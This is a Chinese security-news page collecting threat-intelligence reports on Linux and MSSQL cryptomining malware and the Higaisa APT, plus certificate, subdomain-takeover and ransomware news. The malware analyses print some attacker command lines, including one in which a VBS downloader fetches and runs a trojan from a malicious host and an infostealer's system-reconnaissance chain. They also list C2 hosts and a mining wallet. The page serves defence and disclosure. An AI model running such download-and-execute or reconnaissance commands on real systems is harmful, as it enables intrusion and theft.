分类: 今日推送

警惕 Linux 挖矿木马 SystemMiner 通过 SSH 爆破入侵攻击

感谢腾讯御见威胁情报中心来稿! 原文:https://mp.weixin.qq.com/s/yNiGdnLDbKE9lm_iZVOxPA   一、概述 近日某企业Linux服务器出现卡慢,CPU占用高等现象,向腾讯安全威胁情报中心求助。工程师征得客户同意对该企业网络运行情况进行安全审计。通过对故障服务器进行安全检查,发现该服务器遭遇SSH弱密码爆破入侵。入侵者植入定时任务实现持久化,定时任务下载执行病毒母体INT, INT内置了多个bash命令,会进一步下载执行Linux挖矿木马SystemMiner。 此外入侵者还会利用运维工具ansible、knife等执行命令批量攻击感染内网其他机器,会尝试下载脚本卸载腾讯云云镜、阿里云安骑士等安防产品以实现自保护,入侵者还会修改hosts文件屏蔽其他挖矿网址以独占挖矿资源。 二、病毒分析 1.    入侵阶段 腾讯安全运维专家通过查看失陷主机相关日志,发现入侵者尝试数短时间内爆破SSH接近三千次,爆破入侵成功后会创建执行定时任务kpccv.sh。 2.    持久化 通过创建定时任务实现持久化,定时任务为sh脚本,脚本内容经过base64编码加密。定时任务执行周期为59分钟以内的一个随机数值。 Kpccv.sh经过bash64加密,其主要功能是下载病毒母体INT执行。为了避免下载地址失效,内置了多个下载地址。tencentxjy5kpccv.拼接tor2web.io,tor2web.in等得到完整的下载链接。 Kpccv.sh解密后的内容如下: 3.    病毒母体INT分析 INT为ELF格式可执行文件,运行后创建一子进程执行,内置了多个bash命令,经base64编码加密,每个bash脚本命令都对应着完整的功能模块,下文依次分析每个bash命令实现的具体功能。 3.1 本地持久化 该bash模块主要功能是实现本地持久化,创建定时任务0kpccv,定时任务执行周期为59分钟以内的一个随机数值。定时任务执行kpccv.sh脚本,写入脚本的内容经过了base64编码,其主要功能是下载执行病毒母体INT。 Base64解码后的bash脚本: 3.2 内网渗透&自保护 利用运维工具ansible、knife、salt执行命令实现对内网机器批量感染,执行命令经过base64编码,解码后其功能为下载执行病毒母体INT 下载脚本尝试卸载腾讯云云镜、阿里云安骑士等安全防护产品以实现自保护。 下载可执行文件bot,trc模块执行,目前下载链接已失效。 3.3  清理其他挖矿木马&屏蔽矿池网址 该模块主要功能是清理机器上的挖矿木马,并且修改hosts文件,将常见的挖矿网址systemten.org、pm.cpuminerpool.com等映射到ip地址0.0.0.0,以实现屏蔽其他挖矿网址实现独占系统资源。 3.4 下载执行挖矿木马 执行最核心的功能,下载执行挖矿木马。下载链接通过拼接而成,tencentxjy5kpccv.拼接tor2web.io等,挖矿模块cpu为ELF格式可执行文件。 执行门罗币挖矿,矿池配置如下: 三、安全建议 腾讯安全专家建议各企业对Linux服务器做以下加固处理: 1.采用高强度的密码,避免使用弱口令,并建议定期更换密码。建议服务器密码使用高强度无规律密码,并强制要求每个服务器使用不同密码管理; 2.排查相关Linux服务器是否有kpccv等相关定时任务,有则结束相关进程,清理相关木马文件; 3.在终端/服务器部署专业安全防护软件,Web服务器可考虑部署在腾讯云等具备专业安全防护能力的云服务平台。 4.推荐企业部署腾讯T-Sec高级威胁检测系统(腾讯御界)及时捕捉黑客攻击。御界高级威胁检测系统,是基于腾讯安全反病毒实验室的安全能力、依托腾讯在云和端的海量数据,研发出的独特威胁情报和恶意检测模型系统。(https://s.tencent.com/product/gjwxjc/index.html) IOCs: MD5: 177e3be14adcc6630122f9ee1133b5d3 e5f8c201b1256b617974f9c1a517d662 b72557f4b94d500c0cd7612b17befb70 域名: tencentxjy5kpccv.t.tor2web.io tencentxjy5kpccv.t.tor2web.io tencentxjy5kpccv.t.tor2web.to tencentxjy5kpccv.t.tor2web.in tencentxjy5kpccv.t.onion.to tencentxjy5kpccv.t.onion.in.net tencentxjy5kpccv.t.civiclink.network tencentxjy5kpccv.t.onion.nz tencentxjy5kpccv.t.onion.pet tencentxjy5kpccv.t.onion.ws tencentxjy5kpccv.t.onion.ly 矿池: 136.243.90.99:8080

受 CAA 代码问题影响 Let’s Encrypt 将于 3 月 4 日撤销部分证书

Let’s Encrypt 刚刚宣布,其将于 3 月 4 日起撤销大量 TLS / TTS 证书,并正在向受影响的客户发邮件告知,以便其及时地更新。2 月底的时候,该机构公布起在 CAA 代码中发现了一个 bug,因此需要吊销这部分证书。为避免业务中断,Let’s Encrypt 建议客户在 3 月 4 日前更换受影响的证书,否则网站访客会看到一个与证书失效有关的安全警告。 Let’s Encrypt 在邮件中写道:很遗憾,这意味着我们需要撤销受此错误影响的一批证书,其中包括您的一个或多个证书。因此造成的不便,我们深表歉意。 如果客户无法在证书被吊销(3 月 4 日)前更新,网站访客将看到安全警告,直到证书再次更新。新证书的续签流程,可以在 ACME 文档中找到。 你也可以通过官方工具来查看是否需要更新证书,或者道论坛翻阅相关主题。如有其它疑问,可在撰写帖子时,于模板中发起提问。 据悉,这批证书的吊销时间为世界标准时(UTC)3 月 4 日 00:00 整。   (稿源:cnBeta,封面源自网络。)

“Higaisa(黑格莎)”组织近期攻击活动报告

感谢腾讯御见威胁情报中心来稿! 原文:https://s.tencent.com/research/report/895.html   一、背景概述 腾讯安全威胁情报中心检测到“higaisa(黑格莎)”APT组织在被披露后经过改头换面再次发动新一轮的攻击,在这轮攻击中,该组织舍弃了使用多年的dropper,完全重写了攻击诱饵dropper,此外还引入了dll侧加载(白加黑)技术对抗安全软件的检测和查杀。 “Higaisa(黑格莎)”组织是腾讯安全2019年披露的一个来自朝鲜半岛的专业APT组织,因为其常用higaisa作为加密密码而得名。该组织具有政府背景,其活动至少可以追溯到2016年,且一直持续活跃到现在。该组织常利用节假日、朝鲜国庆等朝鲜重要时间节点来进行钓鱼活动,诱饵内容包括新年祝福、元宵祝福、朝鲜国庆祝福,以及重要新闻、海外人员联系录等等。被攻击的对象包括跟朝鲜相关的外交实体(如驻各地大使馆官员)、政府官员、人权组织、朝鲜海外居民、贸易往来人员等,受害国家包括中国、朝鲜、日本、尼泊尔、新加坡、俄罗斯、波兰、瑞士等。 二、基础信息   文件名 MD5 功能/属性 Happy-new-year-2020.scr 2173b589b30ba2b0242c82c9bcb698b2 dropper Rekeywiz.exe 082ed4a73761682f897ea1d7f4529f69 白文件,用于+加黑 Duser.dll 5de5917dcadb2ecacd7ffd69ea27f986 Downloader cspwizres.exe 54c0e4f8e59d1bd4c1e0d5884b173c42 窃密木马 2020-New-Year-Wishes-For-You.scr 37093D3918B0CC2CA9805F8225CCCD75 dropper Duser.dll 01B90259A9771D470582073C61773F30 Downloader 390366d02abce50f5bb1df94aa50e928 390366d02abce50f5bb1df94aa50e928 Gh0st trojan bbf9822a903ef7b9f33544bc36197594 bbf9822a903ef7b9f33544bc36197594 Gh0st trojan 0a15979a72f4f11ee0cc392b6b8807fb 0a15979a72f4f11ee0cc392b6b8807fb Gh0st trojan 739a40f8c839756a5e6e3c89b2742f8e 739a40f8c839756a5e6e3c89b2742f8e Gh0st trojan 三、鱼叉攻击 与以往的攻击手段类似,“higaisa(黑格莎)”依然以节假日祝福为主题诱饵进行鱼叉钓鱼攻击,最近抓获的攻击邮件主题为“Happy new year 2020”、“2020 New Year Wishes For You”等,欺骗用户下载并打开附件。 附件解压后得到木马诱饵名为Happy-new-year-2020.scr、2020-New-Year-Wishes-For-You.scr,运行后释放并打开与主体相对应的图片欺骗受害者。 四、木马行为分析 1.Dropper 1)2020-New-Year-Wishes-For-You.scr与Happy-new-year-2020.scr功能类似 可能由于被曝光的原因,该组织对dropper进行了重写,舍弃了原来将payload存放在资源及使用“higaisa”作为密钥进行rc4解密的方式,直接从数据段中解密(XOR 0x1A)释放恶意文件到指定目录并执行。释放的恶意文件如下: %ALLUSERSPROFILE%\CommonDatas\Rekeywiz.exe(白) %ALLUSERSPROFILE%\CommonDatas\Duser.dll(黑) %TEMP%\Happy-new-year-2020.jpg(正常的伪装图片) 2)使用com创建EfsRekeyWizard.lnk到启动目录,指向Rekeywiz.exe实现持久化。 2. Downloader 1)Rekeywiz.exe文件为操作系统白文件,运行时会加载edsadu.dll,该文件也是系统自带文件,edsadu.dll加载过程中会加载Duser.dll,实现白加黑攻击: 2)Duser.dll的InitGadgets接口函数中实现了恶意功能,创建恶意线程: 3)使用RC4解密出C2,然后获取磁盘序列号的CRC32值作为tn参数,获取随机字母为ved参数,向C2发送请求,C2为:hxxp[:]//petuity.shopbopstar.top/research/index.php 及 hxxp[:]//adobeinfo.shopbopstar.top/notice/index.php 4)C2返回的数据也是经过RC4加密的数据,解密后为PE文件,释放到temp目录后执行: 5)其中文件名也来自于C2的返回数据,取数据从后往前第一个’&’之后的字符作为文件名: 6)C2返回的数据实例,与之前的攻击类似:最终下载了infostealer+gh0st RAT 3.Infostealer cspwizres.exe(54c0e4f8e59d1bd4c1e0d5884b173c42)文件主要行为是获取计算机信息,并发送到C2。 1)解密出要执行的命令结果如下:主要用于收集系统信息、网络信息、进程信息、文件信息等systeminfo&ipconfig -all&tasklist&net view&dir c:\&dir c:\users\&dir d:\&dir e:\: 2)创建cmd执行以上命令,并通过管道获取执行结果 3)解密出C2,C2地址与之前的攻击活动相似 4)将获取的信息上传到C2中185.247.230.252: 4. RAT 持续监控中发现,后期攻击者会对不同的受害者下载gh0st改版木马驻留受害者系统,我们目前共在受害机发现3个不同版本的gh0st木马。 版本1: 该木马为gh0st RAT,含有文件管理、进程管理、CMDshell等功能,C2: x1.billbord.net:6539。 版本2: 该木马为gh0st RAT,含有文件管理、进程管理、CMDshell等功能, C2: www.phpvlan.com:8080 版本3: 该木马为gh0st远控改版,只保留插件管理功能,所有功能需插件实现,C2: console.hangro.net:1449。 5. TTP/武器更新 1)Dropper 本轮攻击利用“白+黑”的方式加载Downloader模块:rekeywiz.exe+ Duser.dll 2)Downloader 自腾讯安全御见威胁情报中心公布该组织攻击报告后(https://s.tencent.com/research/report/836.html),该组织对其Downloader进行改版,新一批downloader下载功能均基于老版本的curl开源代码实现: 五、MITRE ATT&CK   Tactic ID Name Initial Access T1193 Spearphishing Attachment Execution T1106 Execution through API T1129 Execution through Module Load T1203 Exploitation for Client Execution T1085 Rundll32 T1035 Service Execution T1204 User Execution T1175 Component Object Model and Distributed COM T1072 Third-party Software Persistence T1179 Hooking T1137 Office Application Startup T1038 DLL Search Order Hijacking T1060 Registry Run Keys / Startup Folder Defense Evasion T1140 Deobfuscate/Decode Files or Information T1107 File Deletion T1036 Masquerading T1112 Modify Registry T1027 Obfuscated Files or Information T1085 Rundll32 T1099 Timestomp Credential Access T1179 Hooking T1056 Input Capture Discovery T1083 File and Directory Discovery T1046 Network Service Scanning T1135 Network Share Discovery T1057 Process Discovery T1082 System Information Discovery T1007 System Service Discovery Lateral Movement T1534 Internal Spearphishing Collection T1123 Audio Capture T1005 Data from Local System T1114 Email Collection T1056 Input Capture T1113 Screen Capture Command and Control T1043 Commonly Used Port T1094 Custom Command and Control Protocol T1024 Custom Cryptographic Protocol T1001 Data Obfuscation T1065 Uncommonly Used Port 六、安全建议 我们建议外贸企业及重要机构参考以下几点加强防御: 1、 通过官方渠道或者正规的软件分发渠道下载相关软件; 2、 谨慎连接公用的WiFi网络。若必须连接公用WiFi网络,建议不要进行可能泄露机密信息或隐私信息的操作,如收发邮件、IM通信、银行转账等;最好不要在连接公用WiFi时进行常用软件的升级操作; 3、 提升安全意识,不要打开来历不明的邮件的附件;除非文档来源可靠,用途明确,否则不要轻易启用Office的宏代码; 4、 及时安装操作系统补丁和Office等重要软件的补丁; 5、 使用杀毒软件防御可能的病毒木马攻击,对于企业用户,推荐使用腾讯T-Sec终端安全管理系统(腾讯御点)。腾讯御点内置全网漏洞修复和病毒防御功能,可帮助企业用户降低病毒木马入侵风险; 6、 推荐企业用户部署腾讯T-Sec高级威胁检测系统(腾讯御界)及时捕捉黑客攻击。御界高级威胁检测系统,是基于腾讯安全反病毒实验室的安全能力、依托腾讯在云和端的海量数据,研发出的独特威胁情报和恶意检测模型系统。(https://s.tencent.com/product/gjwxjc/index.html) 七、附录 IOCs 185.247.230.252                        infostealer petuity.shopbopstar.top            downloader adobeinfo.shopbopstar.top    downloader console.hangro.net:1449         gh0st plug www.phpvlan.com:8080          gh0st x1.billbord.net:6539                  gh0st MD5 2173b589b30ba2b0242c82c9bcb698b2 082ed4a73761682f897ea1d7f4529f69 54c0e4f8e59d1bd4c1e0d5884b173c42 4d937035747b4eb7a78083afa06022d3 5de5917dcadb2ecacd7ffd69ea27f986 37093d3918b0cc2ca9805f8225cccd75 01b90259a9771d470582073c61773f30 25c80f37ad9ad235bea1a6ae68279d2e 739a40f8c839756a5e6e3c89b2742f8e 6a0fab5b99b6153b829e4ff3be2d48cd 0a15979a72f4f11ee0cc392b6b8807fb 390366d02abce50f5bb1df94aa50e928 bbf9822a903ef7b9f33544bc36197594 4ff9196bac6bf3c27421af411c57ba52 参考资料 警惕来自节假日的祝福:APT攻击组织”黑格莎(Higaisa)”攻击活动披露 https://mp.weixin.qq.com/s/W87E6_v9YCnsmQWDd7NOHw

苹果 Safari 浏览器将全面封杀超过 13 个月的长效 HTTPS 证书

Safari将在今年晚些时候不再接受新的长效HTTPS证书,也就是自其创建之日起过13个月有效期的新证书。这意味着使用在截止时间点之后发出的长寿命SSL/TLS证书的网站将在苹果系统的浏览器中引发隐私错误。 苹果在证书颁发机构浏览器论坛(CA / Browser)会议上宣布了该政策。从2020年9月1日开始,任何有效期超过398天的新网站证书都不会受到Safari浏览器的信任,而是会被拒绝。而在截止日期之前颁发的较旧证书不受此规则的影响。 通过在Safari中实施该策略,苹果将会通过扩展在所有iOS和macOS设备上实施该策略。这将对网站管理员和开发人员造成一定影响,他们需要调整接下来的证书运营策略,确保其证书满足苹果的要求,否则可能会影响超过10亿台设备和计算机上的页面访问。 PKI和SSL管理公司Sectigo的高级研究员蒂姆·卡兰(Tim Callan)参加了本周在斯洛伐克举行的会议,他证实了这一消息:“本周,苹果在第49届CA/浏览器论坛宣布,他们的产品将否决在9月1日或之后发行的期限超过398天的证书的有效性。9月1日之前颁发的证书将具有与今天的证书相同的可接受期限,即825天,从而无需对这些证书采取任何措施。” 苹果,谷歌和CA/Browser的其他成员已经考虑了缩短证书有效期的问题,该政策有其优点和缺点。 此举的目的是通过确保开发人员使用具有最新加密标准的证书来提高网站的安全性,并减少可能被盗用并重新用于网络钓鱼和恶意驱动程序攻击的旧的、被忽略的证书的数量,短期证书将确保人们在大约一年内迁移到更安全的证书。 缩短证书的使用寿命确实存在一些缺点,通过增加证书替换的频率,苹果和其他公司也使得使用加密证书的网站所有者和企业的管理周期变得更加复杂。不过,“公司可以依靠自动化来协助证书的部署,更新和生命周期管理,以减少人员开销和随着证书更换频率的增加而出现错误的风险。”例如,Let’s Encrypt发行了免费的HTTPS证书,这些证书通常会在90天后过期,并提供了自动续订的工具,如今它们已在整个Web上使用。   (稿源:cnBeta,封面源自网络。)

“快Go矿工”新增 MS SQL爆破攻击,上万台电脑中招

感谢腾讯御见威胁情报中心来稿! 原文:https://s.tencent.com/research/report/888.html   一、背景 腾讯安全威胁情报中心检测到“快Go矿工”更新,该团伙本次更新利用MSSQL弱口令爆破攻击的方式进行传播。“快Go矿工”由御见威胁情报中心于2019年10月发现,最初仅利用“永恒之蓝”漏洞进行攻击传播,因其使用的C2域名中包含“kuai-go”,腾讯安全威胁情报中心将其命名为“快Go矿工”(KuaiGoMiner)。 “快Go矿工”最新变种将挖矿程序伪装成系统进程WinInit.exe,截止目前已挖矿获得门罗币47个,市值人民币2万余元。同时,病毒在攻陷机器上植入的gh0st远控木马,具有搜集信息、上传下载文件、键盘记录、执行任意程序等多种功能,被攻陷的电脑还会面临机密信息泄露的风险。 据腾讯威胁情报中心统计数据,“快Go矿工”(KuaiGoMiner)变种已攻击上万台电脑,受害最严重地区为江苏、山东和广东。 腾讯安全提醒企业用户检查SQL服务器的SA用户口令,切勿配置弱口令登录,快Go矿工入侵后还会使用永恒之蓝系列攻击工具横向传播,植入远控木马,对政企机构信息系统安全构成严重威胁。 二、漏洞攻击 “快Go矿工” (KuaiGoMiner) 变种在攻陷的系统下载攻击模块,释放NSA武器中的“双脉冲星”、“永恒浪漫”、“永恒之蓝”漏洞攻击工具,释放到C:\Windows\Fonts\usa\目录下。 释放成功后go.vbs首先启动,然后执行go.bat,在go.bat中利用服务管理工具NSSM(释放文件名为svchost.exe)将攻击脚本cmd.bat安装为服务HTTPServers反复执行。 cmd.bat请求http[:]//scan.jiancai008.com:88/2020/local.asp和 http[:]//sex.zhzy999.net/ip2.php获取本机的IP地址, 请求http[:]//scan.jiancai008.com:88/2020/random.asp获取随机生成的C段和D段为“0.0“的IP地址,然后利用 “永恒之蓝”漏洞攻击工具针对本机同网段IP和随机生成的IP进行扫描攻击。 三、MSSQL爆破 近期KuaiGoMiner还利用MSSQL弱口令爆破进行攻击,爆破成功后首先通过shell代码写入vget.vbs作为下载者程序,然后利用vget.vbs下载PE木马sql.exe,下载命令如下: C:/Program Files (x86)/Microsoft SQL Server/MSSQL.1/MSSQL/Binn/sqlservr.exe C:/Windows/System32/CScript.exe C:/ProgramData/vget.vbs  http[:]//sex.zhzy999.net/sql.exe C:/ProgramData/taskger.exe sql.exe为gh0st远控木马,该木马控制电脑后,继续下载挖矿木马http[:]//go.jiancai008.com:88/2020/1.rar,然后解压释放文件到目录C:\Windows\Fonts\usa\。 将门罗币挖矿程序WinInit.exe安装为服务”WinIniter”,使用矿池:xmr-eu1.nanopool.org:14433,钱包:4Ao7AGamzR4cs4E4uK5tcFF9TR6ouXMY4LAi64jHGYQZRWYCupQ7coBGzE7BtcHBWvQFreNEMg1s9iws7ejgwZtB1gQ55Uq进行挖矿。 目前该钱包已挖矿获取门罗币47.169个,折合人民币28000余元。 四、安全建议 1.服务器使用安全的密码策略,特别是IPC$、MSSQL、RDP服务的账号密码,切勿使用弱口令; 2.根据微软公告及时修复以下Windows系统高危漏洞; MS17-010永恒之蓝漏洞 XP、WindowsServer2003、win8等系统访问: http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598 Win7、win8.1、Windows Server 2008、Windows10,WindowsServer2016等系统访问:https://technet.microsoft.com/zh-cn/library/security/ms17-010.aspx 建议企业用户使用腾讯T-Sec终端安全管理系统(腾讯御点,下载链接:https://s.tencent.com/product/yd/index.html),个人用户使用腾讯电脑管家进行漏洞扫描和修复。 3.企业用户可部署腾讯T-Sec高级威胁检测系统(御界),发现、追踪黑客攻击线索。腾讯T-Sec高级威胁检测系统是基于腾讯安全反病毒实验室的安全能力、依托腾讯在云和端的海量数据,研发出的独特威胁情报和恶意检测模型系统。(https://s.tencent.com/product/gjwxjc/index.html) IOCs IP 64.111.27.3 Domain sex.zhzy999.net scan.jiancai008.com s.jiancai008.com go.jiancai008.com URL http[:]//sex.zhzy999.net/sql.exe http[:]//go.jiancai008.com:88/2020/1.rar http[:]//go.jiancai008.com:88/2020/2.rar http[:]//go.jiancai008.com:88/2020/3.rar MD5 1a5ba25af9d21f36cf8b3df7d2f55348 b87af17c857b208fcd801cb724046781 09bf2fef86d96ec9a1c3be0a020ae498 57bd72d6dc95ff57b5321a62b9f7cde2 70d3908f1b9909b7d23ee265e77dd1f9 1f1bc2ec00db3551d7700c05c87956df 05c57ccd23ab3f623bf1adda755af226

Microsoft.com 等微软系网站被发现存在子域劫持问题

NIC.gp 的安全研究员和开发人员 Michel Gaschet 于近日提出,Microsoft 在其数千个子域的管理方面存在问题,存在有许多子域可以被劫持并用于攻击用户、员工或显示垃圾内容。据 ZDNet 报道称,Gaschet 在接受其采访时说,在过去三年中,他一直在向 Microsoft 报告带有错误配置的 DNS 记录的子域,但该公司要么忽略报告,要么就是默默地保护某些子域。 Gaschet 表示,他已经在 2017 年向微软报告了 21 个容易受到劫持的 msn.com 子域 [1, 2],并在 2019 年报告了 142 个错误配置的 microsoft.com 子域 [1, 2]。此外,他还分享了其于去年向微软报告的 117 个 microsoft.com 子域列表。 Gaschet 透露,在其报告的所有错误配置的子域中,微软仅解决了其中的几个,被修复的数量占比只有他所报告数量的 5%-10% 左右。并称,该操作系统制造商通常会修复较大的子域,例如 cloud.microsoft.com 和 account.dpedge.microsoft.com,却使其他子域暴露在劫持之下。 他还表示,大多数 Microsoft 子域在其各自的 DNS 条目中容易受到基本错误配置的攻击。Gaschet 称,“根本原因/错误是忘记了 DNS 条目,指向不再存在或根本不存在的内容,例如 DNS 条目内容中的错字。” Gaschet 在 Twitter 上指出,至少有一个垃圾邮件小组已经发现了他们可以劫持 Microsoft 的子域,并通过将其托管在信誉良好的域中来增加其垃圾内容。并表明,他已在至少四个合法的 Microsoft 子域中发现了印度尼西亚扑克赌场的广告,分别为 portal.ds.microsoft.com、perfect10.microsoft.com、ies.global.microsoft.com 和 blog-ambassadors.microsoft.com。 目前,ZDNet 已向微软征求意见,并要求该公司在当日的 Twitter 话题中对 Gaschet 提出的一系列问题发表评论。 Gaschet 在 Twitter 上猜测,微软不优先解决这些问题的原因之一是因为“subdomain takeovers”不属于公司的漏洞悬赏计划的一部分,这意味着即使所报告的问题很严重,这些报告也不会得到优先处理。 同时,Gaschet 敦促微软改变其管理 DNS 记录的方式。并称,这是造成这些错误配置的主要原因。   (稿源:开源中国,封面源自网络。)

Let’s Encrypt 倡议新证书策略 提高抗网络攻击能力

Let’s Encrypt是一家得到Mozilla Firefox和Google Chrome支持的自动化证书颁发机构。今天该机构宣布了一项新措施,从而进一步保护用户免受网络攻击的侵害。这项新功能称之为多角度域认证(multi-perspective domain validation),可帮助证书颁发机构(CA)证明申请人对他们想要获得证书的域具有掌控权。 域验证并不是什么新问题,但在验证过程中还存在很多的漏洞,这意味着网络攻击者可以诱使CA机构错误的颁发证书。而通过多角度域认证,网络攻击者需要同时破坏三个不同的网络路径,这不仅大大提高了安全系数,而且在互联网拓扑社区中也能更快发现网络攻击行为。 在新闻稿中,Let’s Encrypt特别感谢了普林斯顿大学的几位研究人员在多角度域验证方面的帮助,并表示将继续与研究人员合作,以改善设计和实施的有效性。   (稿源:cnBeta,封面源自网络。)

卡巴斯基:Windows 10 升级漏洞并非由公司杀毒工具引起

据外媒报道,微软在发现导致安装失败或安装成功出现某些功能崩溃的问题后取消了Windows 10的安全更新。据了解,这个KB4524244原本是为了解决在卡巴斯基救援盘(Rescue Disk)中发现的一个安全漏洞而推出的。该安全漏洞则是在去年4月被公开的。 尽管卡巴斯基自己在8月份解决了这个问题,但为了保护运行旧版本软件的用户微软还是决定开发额外的补丁。 卡巴斯基表示,升级所导致的问题跟他们的软件无关,因为在KB4524244安装在Windows 10上之后他们已经进行了彻底的检查从而确保跟他们的救援盘工具之间不存在兼容性问题。 “微软还没有就更新问题联系卡巴斯基。经过详细的内部分析,我们的专家得出结论,卡巴斯基的产品不是引发这个问题的原因,”卡巴斯基说道。 另外,卡巴斯基表示,如果更新安装正确且没有遇到任何问题,那么用户就不需方采取任何行动。 微软表示,此次更新不会再发布,但针对已经发现的漏洞他们正在修复中。   (稿源:cnBeta,封面源自网络。)

僵尸网络 Emotet 能通过相邻 Wi-Fi 网络传播

Emotet 是最具危险性的恶意程序之一,它能窃取银行账号,安装不同类型的其它恶意程序。最近其运营者被发现开始采用新的方法进行传播:通过相邻的 Wi-Fi 网络。它利用名为 wlanAPI 的 API 收集附近无线网络的 SSID、信号强度、加密方法如 WPA,然后使用一个常用用户名密码组合列表尝试登陆。 如果成功登陆,被感染的设备会枚举所有连接到该网络的非隐藏设备,然后使用第二个密码列表去猜测连接设备的凭证。 它还会尝试猜共享资源的管理员密码。如果它成功猜出连接设备的密码,那么它就会加载  Emotet 和其它恶意程序。弱密码用户最好修改密码使用强密码。   (稿源:solidot,封面源自网络。)  

2019 勒索病毒专题报告

感谢腾讯御见威胁情报中心来稿! 原文:https://mp.weixin.qq.com/s/DzfUlKXkkMuBJS0UrdboSw   一、概述 勒索病毒作为全球最严峻的网络安全威胁之一,2019年持续对全球范围内的医疗、教育、能源、交通等社会基础服务设施,社会支柱产业造成重创。围绕目标优质化、攻击精准化、赎金定制化的勒索策略,以数据加密为核心,同时展开数据窃取、诈骗恐吓的勒索战术稳定成型,促使勒索病毒在2019年索取赎金的额度有明显增长。老的勒索家族持续活跃,新的勒索病毒层出不穷,犯罪行为愈演愈烈,安全形势不容乐观。 勒索病毒攻击2019典型事件 2019年3月初,国内发现大量境外黑客组织借助恶意邮件传播的GandCrab勒索病毒,黑客通过假冒司法机构发件人,成功攻击感染了我国多个政企机构内网,随后我国多地区机构发起安全预警。 2019年3月下旬,世界最大的铝产品生产商之一挪威海德鲁公司(Norsk Hydro)遭遇勒索软件公司,随后该公司被迫关闭了几条自动化生产线,损失不可估量。 2019年5月26日,易到用车发布公告称其服务器遭受到连续攻击,服务器内核心数据被加密,攻击者索要巨额的比特币。易到表示严厉谴责该不法行为,并已报警。 2019年5月29日,美国佛罗里达州里维埃拉海滩警察局因员工运行了恶意的电子邮件,从而导致该城市基础服务设施遭受勒索软件加密。市政官员于随后召开会议,批准通过一笔大约60万美元的资金用于支付勒索赎金。 2019年6月中旬,世界最大飞机零件供应商之一ASCO遭遇勒索病毒攻击,由于被病毒攻击导致的生产环境系统瘫痪,该公司将1400名工人中大约1000人送回家带薪休假,同时停止了四个国家的工厂生产。 2019年9月22日,国内某大型建筑设计有限公司遭到勒索病毒攻击,被勒索的每台电脑要给出1.5个比特币才能解锁,该公司的电脑全面崩溃,所有图纸都无法外发,该事件引发微博热议。 2019年10月,全球最大的助听器制造商之一Demant遭受勒索病毒入侵,该公司是目前听力行业唯一产品线涵盖助听器、人工中耳、骨导助听器、电子耳蜗及调频语训系统的全面听力解决方案提供者,全球听力检测设备领域的领先者,攻击导致的造成的损失高达9500W美元。 2019年12月,Maze(迷宫)勒索团伙向Southwire集团勒索600W美元,Southwire是北美领先的电线电缆制造商之一,勒索团伙声称:如果Southwire不交赎金,则会在网络上公布该公司的泄漏的120G重要数据。 二、2019年勒索病毒特点总结 1.老牌勒索家族转向精准化,高质量的狩猎行动 观察过去一年腾讯安全威胁情报中心收到的勒索求助反馈,主流老牌勒索家族(如GlobeImposter,Crysis)实施的勒索攻击中,企业用户占据了其绝大部分。这意味着老牌勒索家族已经从广撒网无差别模式的攻击,转变为精准化、高质量的行动,该转变使攻击者每次攻击行动后的收益转化过程更有效。 企业服务器被攻陷则多为对外开放相关服务使用弱口令导致,当企业内一台服务器被攻失陷,攻击者则会将该机器作为跳板机,继续尝试攻击其它局域网内的重要资产,在部分勒索感染现场我们也看到攻击者留下的大量相关对抗、扫描工具,个别失陷环境中攻击者光是使用的密码抓取工具就有数十款之多。 2.威胁公开机密数据成勒索攻击新手段 勒索病毒发展历程中,攻击者勒索的加密币种包括门罗币、达世币、比特币、平台代金券等。观察2019年相关数据可知,基于匿名性,稳定性,便捷性,相对保值性等特点,比特币已基本成为勒索市场中唯一不二的硬通货。 付款方式上,基本使用虚拟货币钱包转账。勒索交涉的沟通过程中,使用IM工具私信的方式在大型攻击中已消失(少量恶搞、锁机类低赎金还在使用),攻击者多选择以匿名、非匿名邮箱沟通交涉,或使用Tor登录暗网,浏览器直接访问明网相应站点使用相应的赎金交涉服务。 2019年,勒索病毒团伙开始偏向于赎金定制化,对不同目标要价各不相同,往往根据被加密数据的潜在价值定价(通常在5K-10w人民币),勒索病毒运营者的这种手法大幅提高了单笔勒索收益。这也导致个别大型政企机构在遭受到针对性的加密攻击后,被开出的勒索金额高达数百万元。 当企业有完善的数据备份方案,拒绝缴纳赎金时,勒索团伙则采取另一种手段:威胁泄露受害者的机密文件来勒索。下图为Maze病毒团伙在数据加密勒索企业失败后,公开放出了被攻击企业2GB私密数据。 Sodinokibi勒索团伙也在黑客论坛发声,称如果被攻击者拒绝拒绝缴纳赎金,则会将其商业信息出售给其竞争对手。通过加密前先窃取企业重要数据,当企业拒绝交付解密赎金情况时,再以公开机密数据为筹码,对企业实施威胁勒索。数据泄露对大型企业而言,带来的损失可能更加严重,不仅会造成严重的经济损失,还会使企业形象受损,造成严重的负面影响。 3.僵尸网络与勒索病毒相互勾结 僵尸网络是一种通过多重传播手段,将大量主机感染bot程序,从而在控制者和感染僵尸网络程序之间所形成的一对多控制的网络,僵尸网络拥有丰富的资源(肉鸡),勒索病毒团伙与其合作可迅速提升其勒索规模,进而直接有效增加勒索收益。在2019年,国内借助僵尸网络实施的勒索攻击趋势也进一步提升,我们观察到主要有以下相互勾结。 A.Emotet僵尸网络伙同Ryuk实施勒索 Ryuk勒索病毒家族起源于Hermes家族,最早的活跃迹象可追溯到2018年8月,国内自2019年7月开始有活动迹象,该团伙的特征之一为勒索赎金额度通常极高(超过百万),观察国内被勒索环境中可知,该染毒环境中同时会伴随着Emotet病毒的检出,而国外也有相关分析,指出该病毒常借助Trickbot,Emotet进行分发。 B.Phorpiex僵尸网络伙同Nemty实施勒索 Nemty 病毒在国内早期主要依靠垃圾邮件传播,在2019年中也依靠Phorpiex僵尸网络大面积投递,下图中IP:185.176.27.132,腾讯安图情报平台中已标识为Phorpiex僵尸网络资产,其上投递了Nemty 1.6版本的勒索变种,此次病毒间的勾结行为导致在2019年国庆期间Nemty勒索病毒一度高发,国内多家企业受到Nemty勒索病毒影响。 C.Phorpiex僵尸网络伙同GandCrab实施的勒索 GandCrab勒索病毒首次出现于2018年1月,也是2019上半年是最为活跃的病毒之一。该病毒在一年多的时间里经历了5个大版本的迭代,于2019年6月1日在社交媒体公开宣布已成功勒索20亿美元将停止运营,GandCrab勒索病毒的整个历程与使用Phorpiex僵尸网络长期投递有密不可分的关系。 D.Phorpiex僵尸网络群发勒索恐吓邮件 你可能收到过类似的邮件:“你已经感染了我的私人木马,我知道你的所有密码和隐私信息(包括隐私视频),唯一让我停下来的方式就是三天内向我支付价值900美元的比特币。” 